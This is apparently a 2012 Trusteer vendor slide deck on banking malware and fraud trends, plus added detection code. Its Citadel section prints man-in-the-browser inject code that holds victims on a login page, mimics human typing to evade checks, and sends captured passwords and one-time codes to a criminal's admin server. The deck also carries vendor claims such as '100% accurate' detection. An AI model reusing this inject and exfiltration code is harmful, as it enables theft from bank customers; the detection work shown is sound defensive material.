Online Fraud: Threats & Trends
Ziv Cohen
Director, EMEA Sales
Trusteer Confidential 2012 ©
Criminals Attack the Weak Link With Malware
Diagram: cyber criminals versus customer accounts. The direct path into the bank is labelled Difficult; the paths through the retail/business customer's device are labelled Easy.
Protect Your Investment
Two emerging trends for malware:
- Back-to-basics tactics: reviving old techniques to bypass security solutions
- Malware self-protection: criminals invest in shielding their malware from
  - malware detection systems
  - anomaly detection systems
  - behavior profiling systems
  - device ID solutions
  - and more
Cybercrime forum trends: more services that let criminals outsource the technical aspects of fraud
Evading Detection (Wrapper)
Evading Detection
Undetectable to AVs
Bypassing Device ID (RDP)
Flow shown on the slides: Notification -> Login -> Injection -> RDP -> Transaction. The malware notifies the criminal when the victim logs in, the injected content holds the victim on the page, and the criminal then connects to the infected machine over RDP and submits the transaction from the victim's own device. The device fingerprint the bank sees is therefore the legitimate one, so device ID checks alone do not flag the session.
Behavior Anomaly Evasion
// Behaviour-anomaly evasion: instead of setting the field value at once, the
// injected script "types" the text one character every 200 ms so the form fill
// resembles a human typing rather than an instantaneous automated write.
slow_fill = function(id, text) {
  var i = 1;
  beepInput(id);                    // visual cue on the field (helper defined elsewhere in the inject)
  var thread = setInterval(function() {
    id.value = text.substr(0, i);   // reveal one more character
    i++;
    if (i == text.length + 1) {
      clearInterval(thread);
      deleteHelpMessage();          // remove the "please wait" overlay (helper defined elsewhere)
    }
  }, 200);
}
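The following is an added example, not code from the deck or from any Trusteer product: a behaviour-profiling check that separates the slow_fill() injection above from a person typing into the same field. It relies on two observations. First, assigning to id.value from script fires no keydown event, so characters appear in the field without matching key presses. Second, setInterval(..., 200) produces near-constant gaps between value changes, while human inter-keystroke intervals vary widely. The event traces and the 0.15 coefficient-of-variation threshold are constructed for illustration; in a page, the events would come from addEventListener('keydown') plus a polling loop or MutationObserver on the field.

```javascript
// Added example: behaviour-based detection of scripted form filling.
// events: [{ type: 'keydown' | 'valuechange', t: <ms timestamp> }, ...]

function stats(values) {
  const n = values.length;
  if (n === 0) return { mean: 0, cv: 0 };
  const mean = values.reduce((a, b) => a + b, 0) / n;
  const variance = values.reduce((a, b) => a + (b - mean) ** 2, 0) / n;
  const sd = Math.sqrt(variance);
  return { mean, cv: mean > 0 ? sd / mean : 0 };   // cv = coefficient of variation
}

// maxCv is an assumed threshold: below it the typing cadence is "too regular".
function analyzeField(events, maxCv = 0.15) {
  const changes = events.filter(e => e.type === 'valuechange').map(e => e.t);
  const keydowns = events.filter(e => e.type === 'keydown').length;
  const gaps = [];
  for (let i = 1; i < changes.length; i++) gaps.push(changes[i] - changes[i - 1]);
  const { mean, cv } = stats(gaps);
  const reasons = [];
  if (changes.length > keydowns) reasons.push('value changed without keydown');
  if (gaps.length >= 4 && cv < maxCv) reasons.push('inter-character cadence too regular');
  return { chars: changes.length, keydowns, meanGapMs: mean, cv, automated: reasons.length > 0, reasons };
}

// Constructed trace 1: slow_fill() writing 8 characters. setInterval drifts by
// a millisecond or two, but no keydown events occur at all.
const injectedTrace = [200, 401, 600, 802, 1001, 1200, 1402, 1601]
  .map(t => ({ type: 'valuechange', t }));

// Constructed trace 2: a person typing the same 8 characters with irregular gaps.
const humanGaps = [0, 180, 95, 310, 140, 420, 90, 260];
const humanTrace = [];
let clock = 0;
for (const gap of humanGaps) {
  clock += gap;
  humanTrace.push({ type: 'keydown', t: clock });
  humanTrace.push({ type: 'valuechange', t: clock + 5 }); // value updates a few ms after keydown
}

console.log(analyzeField(injectedTrace));  // automated: true, two reasons
console.log(analyzeField(humanTrace));     // automated: false
```

Two caveats for anyone deploying something like this. A better-written inject can randomise the delay and dispatch synthetic KeyboardEvents to defeat both heuristics, although script-dispatched events carry isTrusted === false, which is a third signal worth recording. Treat the result as one feature for a risk score, not a standalone verdict.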
Russian Banks Targeted by Malware
The attacker:
- Citadel, a descendant of Zeus, with man-in-the-browser (MITB) functionality
The targets:
- VTB24 (/WebNew/login.aspx)
- Russian Standard Bank (rsb.ru)
- Avangard Bank (avangard.ru)
The method:
- Steal credentials
- Steal OTPs
- HTML injection
- Real-time victim-to-cybercriminal communications
Example of attack flow
1. Capture credentials in real time.
2. The malware checks that the credentials are valid.
3. Communicate with the user (the injected page shows a "please wait" message).
4. Credentials are sent to the C&C in real time via Jabber.
5. The cybercriminal logs in with the credentials after pausing the victim.
Webinject rule (inserts an onkeypress handler into the password field so that pressing Enter no longer submits the form; the victim is held on the page while the injected script talks to the criminal):
<WebInject>
 <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before>
 <After><![CDATA[]]></After>
 <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data>
</WebInject>
// Once both fields hold more than three characters, store them client-side
// with the inject's own helper (write_c, paired with read_c below) and start
// polling the admin server for a "block" instruction.
function Check() {
  if (login.value.length > 3 && pass.value.length > 3) {
    write_c('login', login.value, 3);
    write_c('pass', pass.value, 3);
    check_block();
  }
}
Message shown to the victim while the session is paused: "Пожалуйста, ожидайте. Происходит Авторизация!" ("Please wait. Authorization in progress!")
// Report the captured login, password and TAN to the criminal's admin panel,
// and push a Jabber (XMPP) message so the criminal is notified in real time.
function KnockToAdmin() {
  var link = log_link + "?log=" + read_c('login') + "&pass=" + read_c('pass') + "&tan=" + tan.value;
  GetDataACD_knock_to_admin(link);
}
function SendMsg(msg) {
  var link = jabb_link + '?log=' + msg;
  GetDataACD_sendmsg(link);
}

// Polling: the injected page repeatedly asks the admin server for per-victim
// control files (<login>/block.me, /kod.2, /free.use). The criminal uses them
// to pause the victim, request the next OTP code, or release the session.
function WaitForBlock() {
  var link = admin_logs + read_c('login') + '/block.me';
  GetDataACD_WaitForBlock(link);
}
function WaitForNextCode() {
  var link = admin_logs + read_c('login') + '/kod.2';
  GetDataACD_WaitForNextCode(link);
}
function WaitForFreeUse() {
  var link = admin_logs + read_c('login') + '/free.use';
  GetDataACD_WaitForFreeUse(link);
}
function OnLoadACD_check_block() {
  // body not reproduced on the slide
}
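As an added example (not Citadel's code and not from the deck), the block below applies the WebInject rule shown above to a constructed copy of the login form, then runs the kind of integrity check a bank could use to notice the result. The applier follows the Zeus/Citadel webinject convention: the text between the Before and After matches is replaced by Data, and with an empty After, Data is inserted immediately after the Before match. The login form markup is constructed for this example from the field names in the rule; the parser handles only the single-rule, CDATA-wrapped form seen on the slide.

```javascript
// Added example: apply a Zeus/Citadel-style <WebInject> rule and detect the result.

const rule = `<WebInject>
 <Before><![CDATA[<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text"]]></Before>
 <After><![CDATA[]]></After>
 <Data><![CDATA[ onkeypress="if(event.keyCode == 13) return false;"]]></Data>
</WebInject>`;

// Pull the CDATA body of one element out of the rule text (null if absent).
function cdata(xml, tag) {
  const m = xml.match(new RegExp(`<${tag}><!\\[CDATA\\[([\\s\\S]*?)\\]\\]></${tag}>`));
  return m ? m[1] : null;
}

function parseWebInject(xml) {
  return { before: cdata(xml, 'Before'), after: cdata(xml, 'After'), data: cdata(xml, 'Data') };
}

// Rewrite served HTML the way the MitB hook does before the browser renders it.
// Returns the HTML untouched if the Before (or After) marker is not present.
function applyWebInject(html, inj) {
  const start = html.indexOf(inj.before);
  if (start < 0) return html;
  const insertAt = start + inj.before.length;
  if (inj.after === '') return html.slice(0, insertAt) + inj.data + html.slice(insertAt);
  const end = html.indexOf(inj.after, insertAt);
  if (end < 0) return html;
  return html.slice(0, insertAt) + inj.data + html.slice(end);
}

// Constructed login form modelled on the field names in the rule.
const servedPage = `<form id="login" method="post">
<input name="TextBoxLogin" type="text" size="20" id="TextBoxLogin" class="text">
<input name="TextBoxPassword" type="password" size="6" id="TextBoxPassword" class="text">
<input type="submit" value="Login">
</form>`;

// Integrity check: list inline on*= handler attributes per <input>. The bank
// knows its own markup ships none, so any such attribute marks an injection.
function inlineHandlers(html) {
  const found = [];
  const inputRe = /<input\b([^>]*)>/gi;
  let m;
  while ((m = inputRe.exec(html)) !== null) {
    const attrs = m[1];
    const id = (attrs.match(/\bid="([^"]*)"/) || [])[1] || '(no id)';
    const handlers = [...attrs.matchAll(/\b(on[a-z]+)="/gi)].map(h => h[1]);
    if (handlers.length) found.push({ id, handlers });
  }
  return found;
}

const inj = parseWebInject(rule);
const tampered = applyWebInject(servedPage, inj);
console.log(tampered.split('\n')[2]);       // password input now carries onkeypress=...
console.log(inlineHandlers(servedPage));    // []
console.log(inlineHandlers(tampered));      // [{ id: 'TextBoxPassword', handlers: ['onkeypress'] }]
```

The check has to run from the client's rendered DOM (or from a page-integrity beacon), not from the server's copy of the HTML: the injection happens inside the browser after the TLS session has ended, so the bytes the server sent are exactly what it expects. A real deployment would also hash the whole form and compare against a per-release baseline, since an inject can just as easily add a new field as an attribute.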
Fraud as a Service: An Identity Is Born
Fraud as a Service: Create a New Account
Selling bank account packages:
- Bank account information + ATM card
- Online banking credentials
- Official documents (including passports)
- Price: 12,000 rubles (~$360)
Also offering a cashout service for a 5% fee
Fraud as a Service
"Will buy a Corporate identity in one of the following countries"
A corporate identity is an identity, online or real, that is authorized to make changes and transfers in a corporate bank account.
I'm interested in credentials. Can be mixed countries, with United Arab Emirates, also interested in Poland, Italy, Netherlands
Too Lazy?
Security Silos FAIL!
Holistic Approach for Cybercrime
Diagram: threats arriving over the web (phishing and malware fraud; advanced threats against employees; mobile fraud risk) hit the online/mobile banking channel and the assets behind it (money, intellectual property, business data), resulting in account takeover and new account fraud.
Trusteer Cybercrime Prevention Architecture
- Trusteer Rapport (PC/Mac): compact software agent that prevents malware and phishing attacks
- Trusteer Mobile (iOS, Android): endpoint solution for detecting malware, jailbreak and other mobile risk factors; out-of-band authentication
- Trusteer Pinpoint Malware Detection: 100% accurate clientless detection of active MitB malware on users' devices
- Trusteer Pinpoint ATO Detection: conclusive criminal access detection by correlating device fingerprint with account compromise history
- Centralized management, alerting and reporting
Thank You